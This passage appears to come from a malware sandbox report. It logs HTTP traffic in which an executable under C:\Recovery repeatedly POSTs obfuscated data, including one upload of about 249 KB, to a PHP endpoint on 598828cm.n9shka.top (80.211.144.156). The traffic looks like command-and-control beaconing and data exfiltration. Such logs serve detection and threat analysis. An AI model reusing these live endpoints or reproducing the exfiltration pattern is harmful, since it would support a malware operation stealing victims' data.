                                                    Data Ascii: SWY\TDZX^^VQVXTXWR\ZWQUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+<%Z0&V!7)==!Y+3^<%\3_*901970=Y,&F/%Z-%
                                                    Sep 14, 2024 12:53:28.684290886 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:28.883975983 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.46278480.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:29.085387945 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:29.431091070 CEST1012OUTData Raw: 56 57 59 5c 51 41 5f 5f 5e 5e 56 51 56 58 54 5a 57 5f 5c 5a 57 5f 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VWY\QA__^^VQVXTZW_\ZW_UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%[?,-Y3.:R" ]*-2"0^%()':! )Z/&F/%Z-%
                                                    Sep 14, 2024 12:53:29.778774977 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.46278580.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:29.834629059 CEST292OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 249380
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:30.181233883 CEST12360OUTData Raw: 53 57 59 5a 54 49 5f 58 5e 5e 56 51 56 59 54 5d 57 5f 5c 5b 57 5e 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SWYZTI_X^^VQVYT]W_\[W^U[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+/='X.!48=>!5$\' _%,<3P&\!] 5Y8<&F/%Z-!
                                                    Sep 14, 2024 12:53:30.186211109 CEST6180OUTData Raw: 3d 3d 31 2b 23 28 1c 37 00 20 3e 54 31 3c 5a 24 37 3c 2e 51 0a 00 53 16 00 2c 07 29 31 59 22 04 22 3b 3a 08 29 54 3e 3e 0a 0b 3d 55 0f 38 2d 03 0f 24 00 02 25 23 28 1d 3a 21 0e 11 3e 2c 34 06 23 0a 3d 50 31 00 1a 08 06 20 05 5a 29 3e 00 23 3d 43
                                                    Data Ascii: ==1+#(7 >T1<Z$7<.QS,)1Y"";:)T>>=U8-$%#(:!>,4#=P1 Z)>#=C?.!]SV):_>4::^*W>Z"=0/?5*Y16# X_7;647/':";#>,)F8E:+[T$!(>7CU$04@'^2(V*Z;6-7\02Z4?]="0,'Z2%:U9%%)
                                                    Sep 14, 2024 12:53:30.186230898 CEST1236OUTData Raw: 35 1f 36 59 3f 26 3d 05 0b 37 29 04 25 34 2a 19 24 09 05 58 3a 57 06 02 33 03 57 2a 3f 09 26 14 35 3a 1a 1e 38 0f 37 14 05 2e 2e 3d 3c 1a 48 3e 21 28 1d 2d 13 1c 3d 05 21 03 2d 50 3d 2b 29 3d 0f 5c 32 36 3f 3d 04 3c 38 3e 26 2c 0a 33 3e 01 30 3f
                                                    Data Ascii: 56Y?&=7)%4*$X:W3W*?&5:87..=<H>!(-=!-P=+)=\26?=<8>&,3>0?>]?%3:%+X-'0_=&(\(&2;U;28\B!?<>(2%7Y]53+2< ST)$;' ^3$^,>=!*[<:6.6/<=Z4<!2=8Q4!9Y=6T,2<"5><$=#!'Y"!R*%8*6UW2Z=:399<
                                                    Sep 14, 2024 12:53:30.186252117 CEST2472OUTData Raw: 3a 0b 15 5c 32 3a 59 08 3b 2e 13 12 25 5c 1b 18 2a 57 14 09 3d 59 03 34 33 04 0f 1a 0a 3d 3f 55 31 10 1b 12 32 3d 26 1c 3c 08 3e 24 05 33 3e 02 39 24 29 2b 3d 01 25 20 32 07 0f 59 3c 21 2c 22 0e 30 20 2a 25 5b 38 1f 3e 32 2e 33 33 2e 53 3d 00 31
                                                    Data Ascii: :\2:Y;.%\*W=Y43=?U12=&<>$3>9$)+=% 2Y<!,"0 *%[8>2.33.S=14>.*=@726:?W)==^*')=>3<-*X-5]0?;=,)0>5:<,$*$%/_,:$4!&X6(@8Y_98&T& \!3Z7 ,(0,0+//%^05<3 Z3=*_<0+,04< "-R';";
                                                    Sep 14, 2024 12:53:30.186369896 CEST4944OUTData Raw: 22 2c 0a 1b 22 39 0b 5d 3e 23 18 2d 36 33 0d 58 30 3f 5f 19 33 55 0d 17 31 08 0e 5b 28 37 58 06 09 5d 15 55 04 2c 52 3d 2a 23 25 28 32 02 2c 5b 33 1b 26 31 05 2c 53 10 08 3d 0d 16 3a 23 00 1f 09 26 0a 14 21 20 17 19 3d 23 30 07 34 32 39 06 3a 07
                                                    Data Ascii: ","9]>#-63X0?_3U1[(7X]U,R=*#%(2,[3&1,S=:#&! =#0429:)?$&1$?%(*=)*P62[5-6R=8R(/-)2:55+Y?B!']2\?8"<1:# /'X3>'0+=7V[U&?AT W%$)""3*-#]%>&."7:U&<=5742Z5,8<;$<; ];]0^1;
                                                    Sep 14, 2024 12:53:30.186460972 CEST7416OUTData Raw: 3a 16 0b 3b 39 0f 35 2f 08 30 3b 5c 27 2a 3e 27 0e 00 52 01 13 5e 14 51 06 32 10 52 31 07 03 03 30 3c 0f 52 38 28 1e 51 36 03 25 0e 0a 32 3a 5c 3d 0f 18 15 06 22 14 25 08 35 21 28 39 28 03 2f 38 3b 2a 03 3f 32 2f 59 22 30 24 31 3f 3b 57 00 3b 0d
                                                    Data Ascii: :;95/0;\'*>'R^Q2R10<R8(Q6%2:\="%5!(9(/8;*?2/Y"0$1?;W;W\$>/45U%CAH:)7\=&7:899?*]:=](%U+<?Y=8S7;*>-]<];80?(4&;4U,B5/9Q\)U787;"()6V_/7'867/5$!%Z<B"740+=3>=0
                                                    Sep 14, 2024 12:53:30.186500072 CEST2472OUTData Raw: 0b 56 02 05 0f 22 13 26 38 2a 0f 1c 27 0e 52 59 38 21 0a 02 0c 27 21 1f 22 5a 3d 21 15 2b 3d 18 35 30 5d 17 29 2d 29 1f 05 3d 0b 13 23 05 05 11 32 02 17 11 25 2d 18 1d 39 24 22 2b 34 2d 25 10 32 24 31 05 08 15 3d 32 3c 06 2a 3f 3d 20 1a 1d 0d 1c
                                                    Data Ascii: V"&8*'RY8!'!"Z=!+=50])-)=#2%-9$"+4-%2$1=2<*?= /3 >>'1;$-0U4)2":($8W:\"%?)':!!\-%9>)UU9/0>;=1!9:;$;+>1_6\<:1:>?,9!F:(;6]6W:*==#=2Z1*A3;:8331^1?30%),Q%Z
                                                    Sep 14, 2024 12:53:30.191173077 CEST4944OUTData Raw: 01 38 02 30 3b 04 08 06 38 32 22 18 05 3a 21 1e 08 3c 02 28 21 3b 50 15 06 57 32 3d 29 2d 28 13 04 3d 34 1b 34 55 5a 19 04 21 1a 19 35 40 0a 1d 38 5c 3f 31 30 06 00 5a 3e 1c 25 03 3e 3e 30 03 3d 27 04 21 32 02 2c 2a 08 06 3b 04 08 20 22 5d 30 2b
                                                    Data Ascii: 80;82":!<(!;PW2=)-(=44UZ!5@8\?10Z>%>>0='!2,*; "]0+Y-'V[=W1+5$831. T%+2%1]%99P32[6R!>/3[V29;6:U4=:=$498:.<U .=->::6#,]@V'\<T-':9W>**\!)>2!.=<V+:'Z-R7%3,
                                                    Sep 14, 2024 12:53:30.191216946 CEST4944OUTData Raw: 27 37 28 20 08 3e 0b 35 3e 23 38 00 3f 57 5a 2a 3c 3a 0b 5b 39 2d 3e 58 39 21 06 05 3e 04 1f 59 21 59 1f 27 23 2b 14 21 37 0e 5d 28 04 13 3d 29 3b 2f 39 33 25 59 1a 2e 34 04 29 52 3f 59 3e 10 24 52 3a 0a 35 36 54 13 09 1b 29 17 25 3b 29 39 0e 01
                                                    Data Ascii: '7( >5>#8?WZ*<:[9->X9!>Y!Y'#+!7](=);/93%Y.4)R?Y>$R:56T)%;)9="_X'<%/7?9+24,T:>BS8R?U5=+6S_Z]S;Z["-T\>&\7Z:Z$,144*!Y*:(\47%6. "A0^)##6)Y&*W>>2T[2 \>(X3@P^9&1=15=W)2B)
                                                    Sep 14, 2024 12:53:30.191260099 CEST2472OUTData Raw: 26 5c 59 14 3e 09 20 1a 0c 20 3f 5a 27 05 34 26 3e 31 22 3b 04 29 2c 2e 01 33 0e 14 32 32 3e 2a 28 26 3b 25 3a 07 24 16 11 33 17 00 08 5c 2a 0f 27 03 21 00 21 39 00 0a 3d 05 00 38 3b 02 3a 27 3d 09 36 39 04 5a 3a 28 3c 13 52 0c 0f 26 23 21 33 02
                                                    Data Ascii: &\Y> ?Z'4&>1";),.322>*(&;%:$3\*'!!9=8;:'=69Z:(<R&#!3=#.H_+>19,?=: >;3]93#C;";>>20/0;C2]U,&&/%9)TQ0.1;/><8*4R3-+2/$W(,<&"#35<+!]#"&TK;=Y Z-="6/WQ>F31W=Z0Z515
                                                    Sep 14, 2024 12:53:30.528381109 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:31.270220041 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.46278680.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:30.043514013 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:30.399857998 CEST1012OUTData Raw: 56 50 59 5e 54 41 5f 5b 5e 5e 56 51 56 52 54 5e 57 52 5c 59 57 5f 55 57 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VPY^TA_[^^VQVRT^WR\YW_UWQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+,*0X&R!)>*^!Y;0(,\':(')!\ 3"8&F/%Z-
                                                    Sep 14, 2024 12:53:30.713251114 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:30.840540886 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.46278780.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:30.965416908 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1008
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:31.321805954 CEST1008OUTData Raw: 56 54 59 5f 51 43 5a 5a 5e 5e 56 51 56 5b 54 5d 57 56 5c 54 57 5c 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VTY_QCZZ^^VQV[T]WV\TW\UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y<"0>V5(Z)[6_"4$?1 ?931:5]4/&F/%Z-1
                                                    Sep 14, 2024 12:53:31.636471987 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:31.768908024 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.46278880.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:31.640510082 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1736
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:31.993634939 CEST1736OUTData Raw: 53 57 59 54 54 43 5f 58 5e 5e 56 51 56 5b 54 59 57 5e 5c 5c 57 5a 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SWYTTC_X^^VQV[TYW^\\WZU[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<?5Z'-:R"7?=.!!Y+';(^2+Z+7Q1\&7![.,&F/%Z-!
                                                    Sep 14, 2024 12:53:32.336026907 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:32.529690027 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 59 29 1d 30 10 37 39 3c 18 3c 3c 32 58 2a 0c 04 5c 3e 02 02 06 2a 0a 22 01 2a 13 3f 51 30 12 23 02 33 0f 00 04 27 37 2c 0b 22 01 2e 5a 0c 1d 20 00 20 0d 3a 11 25 3b 35 03 25 21 26 17 20 21 3b 5f 25 5d 21 59 21 2f 29 01 2b 38 21 1b 3e 0f 08 0d 29 3d 31 1a 2f 5b 35 0e 20 28 23 51 00 10 25 08 31 2e 13 5a 35 27 35 11 28 31 3e 00 26 36 32 57 33 15 25 03 31 06 35 5d 24 1d 30 03 20 22 2f 11 27 3c 23 1a 37 20 21 53 28 3e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #Y)079<<<2X*\>*"*?Q0#3'7,".Z :%;5%!& !;_%]!Y!/)+8!>)=1/[5 (#Q%1.Z5'5(1>&62W3%15]$0 "/'<#7 !S(>#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.46278980.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:31.903327942 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:32.259241104 CEST1012OUTData Raw: 56 53 5c 59 51 44 5a 5b 5e 5e 56 51 56 53 54 5a 57 52 5c 5e 57 5d 55 57 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VS\YQDZ[^^VQVSTZWR\^W]UWQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<=015=2\50[3&:+_(91> U&,&F/%Z-
                                                    Sep 14, 2024 12:53:32.591936111 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:32.724231005 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.46279080.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:33.008498907 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:33.353183031 CEST1012OUTData Raw: 56 52 5c 5c 54 42 5f 5f 5e 5e 56 51 56 5e 54 52 57 52 5c 5a 57 50 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VR\\TB__^^VQV^TRWR\ZWPUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<<&=.R#$8[)-!?0;;%\/^<97Q'**!3\.<&F/%Z-=
                                                    Sep 14, 2024 12:53:33.676336050 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:33.804290056 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.46279180.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:33.932869911 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:34.290548086 CEST1012OUTData Raw: 56 54 59 5d 54 44 5f 5b 5e 5e 56 51 56 59 54 5b 57 50 5c 5d 57 5e 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VTY]TD_[^^VQVYT[WP\]W^U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(Z6&=15 >6^6,8Y'8/%\7+_(%*"#38<&F/%Z-!
                                                    Sep 14, 2024 12:53:34.799982071 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:34.800520897 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:53:34.801136017 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.46279280.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:34.940041065 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:35.290482998 CEST1012OUTData Raw: 56 52 59 5a 51 46 5a 58 5e 5e 56 51 56 5c 54 5c 57 53 5c 5f 57 5f 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VRYZQFZX^^VQV\T\WS\_W_UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?,:3-!Q?=""/$3]%7^+*41:=_##*,&F/%Z-
                                                    Sep 14, 2024 12:53:35.605925083 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:35.740607977 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.46279380.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:35.902857065 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1008
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:36.259403944 CEST1008OUTData Raw: 53 55 59 5e 54 48 5f 5c 5e 5e 56 51 56 5b 54 58 57 56 5c 5c 57 5b 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SUY^TH_\^^VQV[TXWV\\W[UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X<?%^36;>>-!<[0<%97(9,29)_ %/&F/%Z-%
                                                    Sep 14, 2024 12:53:36.586179018 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:36.720196009 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.46279480.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:36.848117113 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
